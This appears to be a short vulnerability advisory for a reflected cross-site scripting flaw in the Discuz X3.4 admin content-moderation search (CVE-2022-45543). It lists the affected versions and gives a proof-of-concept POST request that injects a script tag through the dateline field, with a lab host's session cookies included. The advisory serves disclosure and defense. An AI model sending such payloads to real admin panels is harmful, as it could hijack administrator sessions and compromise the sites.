0%

Discuz X3.4 Backend Reflected XSS (CVE-2022-45543)

Description

Admin backend audit search of content audit component with reflected-XSS in POST value dateline, title, tpp and username, which bypassed discuz security check and even could hijack callback url link, and it can also inject javascript to setTimeout at the end of html response.

Affected Version

DiscuzX <= 3.4, SC_UTF8_20221111

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST /cms/discuz/upload/admin.php?action=moderate&operation=threads HTTP/1.1
Host: 192.168.0.4
Content-Length: 166
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.4
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.4/cms/discuz/upload/admin.php?action=moderate&operation=threads
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: 5Kkn_2132_saltkey=y03s5T45; 5Kkn_2132_lastvisit=1668496347; 5Kkn_2132_ulastactivity=07108qps3b3FkXEEZNxrT%2BtyQpXYN9%2FSOodQCNbMLoO%2BO6DOk8pF; 5Kkn_2132_auth=7791L55DZFdkAgcM5rDcnjIiVH0t%2BptlGCIqLkAhUIRMsUDTnq%2BGi7atBCt%2BPdyl2mCVv0hA3jA%2BxaOfDB1h; 5Kkn_2132_lastcheckfeed=1%7C1668501456; 5Kkn_2132_nofavfid=1; 5Kkn_2132_sid=yhpz44; 5Kkn_2132_lip=172.17.0.1%2C1668502019; 5Kkn_2132_lastact=1668502045%09admin.php%09
Connection: close

formhash=288a0c1d&scrolltop=&anchor=&username=aa&title=aa&tpp=20&filter=normal&modfid=all&dateline=604"></a><script>alert(1)</script><!--&modsubmit=%E6%8F%90%E4%BA%A4

Reference

Reported by Srpopty, vulnerability discovered by using Corax.